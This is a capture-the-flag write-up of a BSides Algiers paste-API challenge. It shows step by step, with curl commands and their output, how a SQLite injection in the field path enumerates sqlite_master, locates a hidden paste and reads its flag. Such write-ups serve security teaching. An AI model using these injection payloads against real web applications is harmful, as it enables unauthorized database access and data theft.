Rating:

Upon opening the challenge link, we are shown an api description:

![Trashbin_Api](https://github.com/0x13A0F/CTF_Writeups/raw/master/bsides_algiers/images/1_1.png)

We can create a paste, delete it, read the entire paste, or only accessing a particular field of the paste (text or title)

Even though this challenge was easy, we took quite a while to solve it, because we went on a totally different path.

Let's start by creating a paste:

```bash
th3jackers$ curl -X POST http://chall.bsidesalgiers.com:8001/paste/new -H "Content-Type: application/json" -d '{"title":"just a title","text":"just a content"}'

{"success":true,"url":"/paste/veisbzgx"}
```

Let's read it

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx

{"success":true,"text":"just a content","title":"just a title"}
```
After few tries, it seems there is nothing interesting here, let's try reading by field

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/title

just a title

th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/text

just a text
```
Humm ... it's a bit different here, there is no object returned.
We tried injecting some stuff like 1+1 and indeed it returned 2 instead of an error, same thing if we put a string (inside quotes).

we spent some time here trying to figure out how it works, how is it evaluating inputs.

First we thought it was python-related (since this is a Flask app),maybe he is fetching the paste from db, putting it in a dictionary and then trying to access the dictionary by key, but this didn't make much sense.

Then, my team mate tried putting `*` as a field and this is what happened:

```bash
th3jackers$ curl http://chall.bsidesalgiers.com:8001/paste/veisbzgx/*

veisbzgx
```

Finally this was the trigger, my team mate guessed it must be a classic sql injection :p and indeed it was Sqlite, we tried locally and sqlite returned exactly the same output of all the different inputs we tried.

The rest was easy, first get the table name

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/veisbzgx/name%20from%20sqlite_master%20WHERE%20type='table'%20union%20select%20'x'"

pastes
```

then get the id of the paste containing the flag

P.S: `union select 'x'` act as a comment because regular comments somehow doesn't work.

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/veisbzgx/id%20from%20pastes%20where%20text%20like%20%22%shellmates%7B%%22%20%20union%20select%20'x'"

sp05m8vu
```

```bash
th3jackers$ curl "http://chall.bsidesalgiers.com:8001/paste/sp05m8vu/text"

shellmates{2021_y3t_sQl_1nj3ct10ns_4r3_st1ll_4_pr0bl3m}
```

Flag: `shellmates{2021_y3t_sQl_1nj3ct10ns_4r3_st1ll_4_pr0bl3m}`